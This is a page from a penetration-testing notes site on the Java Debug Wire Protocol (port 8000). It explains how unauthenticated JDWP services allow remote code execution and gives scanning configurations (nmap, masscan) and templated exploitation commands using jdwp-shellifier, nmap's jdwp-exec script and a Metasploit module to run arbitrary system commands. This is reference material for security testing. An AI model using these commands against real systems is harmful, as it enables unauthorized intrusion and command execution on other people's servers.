InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Overview
  • Network scan
  • Remote Code Execution
  • References
  1. L7

8000 - JDWP

Overview

The Java Debug Wire Protocol (JDWP) is one of three interfaces of the Java Platform Debug Architecture, which is designed for debugging purposes in development environments. The JDWP is a communication protocol used for the exchanges between a debugger and a Java Virtual Machine (JVM) being debugged, sometimes referred to as the "target JVM".

The JDWP protocol is asynchronous and implement two basic packet types: command packets and reply packets. The command packets are used to instruct the receiving component to execute of a specific command. While command packets can be sent by both the debugger and the target JVM, they are generally sent by the debugger. The reply packets are only sent in response to a command packet and return information about the command execution (command execution status, command output, etc.).

Remote code execution can be achieved through the JDWP protocol, as it support the loading of arbitrary classes into the target JVM and the invocation of functions. The code will be executed on the remote system under the security context of the target JVM.

One example of a simplified process to remotely execute system commands is as follow:

  • setting of a breakpoint on a method often called during runtime such as java.net.ServerSocket.accept() or java.lang.String.indexOf(). This step is required as the next instructions must be executed in a running context (and will thus be executed only after the triggering of the breakpoint).

  • retrieval of the JVM's runtime context (of the thread in which the breakpoint is triggered) by sending a ClassType/InvokeMethod packet invoking the java.lang.Runtime.getRuntime() static method.

  • allocation of a Java String object that will contain the operating system command to execute.

  • calling of the Runtime.exec() method to execute the system command defined in the previously allocated string.

Another possibility is to inject a Java class, as a byte array, into the target JVM using secureClassLoader.defineClass. Following the remote loading, a method of the injected class can be invoked to conduct the shell commands execution.

As intended for non-production environments, the JDWP protocol does not support authentication nor data encryption.

Disabled by default, a JVM must be explicitly started with the following arguments in order to be remotely debuggable (and thus exposing a JDWP interface):

  • Before Java 5.0, -Xdebug and -Xrunjdwp.

  • Starting from Java 5.0, -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=<*:8000 | *:PORT>

Network scan

While JDWP services are standardly exposed on port TCP 8000, the port number of the service is specified at the JVM start. JDWP services may thus be accessible on any TCP ports.

Note that JDWP communications are initiated by a both-way handshake, with the debugger sending a JDWP-Handshake string and the target JVM responding using the same string. Through this handshake, JDWP services can be reliably identified.

nmap -v <-p 8000 | -p-> -sV -sC -oA nmap_JDWP <RANGE | CIDR>

massscan with the configuration file below can be used to scan the network for accessible JDWP services by scanning for open TCP ports and attempting a JDWP-Handshake handshake.

# Usage: masscan [-v] -c <JDWP_MASSCAN_CONF>
# Adapted from: https://raw.githubusercontent.com/IOActive/jdwp-shellifier/master/jdwp-masscan.cfg

rate =  <5000.00 | RATE>
randomize-hosts = true
banners = true
rotate = 0
rotate-dir = .
rotate-offset = 0
rotate-filesize = 0

range = <IP | RANGE | CIDR>
ports = <3999,5000,5005,8000,8453,8787-8788,9001,18000 | 1-65535 | TCP_PORTS>

min-packet = 60
hello-string[0] = SkRXUC1IQU5EU0hBS0U=

Remote Code Execution

The Metasploit's exploit/multi/misc/java_jdwp_debugger module, the jdwp-shellifier Python script, and the nmap's jdwp-exec NSE script can be used to exploit a JDWP service to execute remote operating system commands.

The nmap's jdwp-exec NSE script remotely inject a Java class while the Metasploit module and jdwp-shellifier.py directly retrieve the Runtime context to call the Runtime.exec() method.

Note that the Metasploit's exploit/multi/misc/java_jdwp_debugger module drops a payload file to disk and by doing so may trigger antivirus alerts. Neither nmap's jdwp-exec NSE script nor jdwp-shellifier.py upload a file to the targeted system.

# If executed with out a command, jdwp-shellifier will retrieve basic system information (OS version, current user, Runtime ClassPath, etc.).
# Defaults to break on "java.net.ServerSocket.accept" calls.
# Setting a breakpoint on "java.lang.String.indexOf" can be more reliable.  
jdwp-shellifier.py -t <IP | HOSTNAME> -p <PORT> [--break-on <'java.lang.String.indexOf' | JAVA_METHOD>]
jdwp-shellifier.py -t <IP | HOSTNAME> -p <PORT> [--break-on <'java.lang.String.indexOf' | JAVA_METHOD>] --cmd "<COMMAND>"

nmap -v -sT -sV -p <PORT> --script=+jdwp-exec --script-args cmd="<COMMAND>" <IP | HOSTNAME | RANGE | CIDR>

msf > use exploit/multi/misc/java_jdwp_debugger

References

https://docs.oracle.com/javase/7/docs/technotes/guides/jpda/jdwp-spec.html https://ioactive.com/hacking-java-debug-wire-protocol-or-how/ https://book.hacktricks.xyz/pentesting/pentesting-jdwp-java-debug-wire-protocol https://www.redteamsecure.com/research/exploitation-java-debug-wire-protocol

Previous5985 / 5986 - WSManNext9100 - Printers

Last updated 3 years ago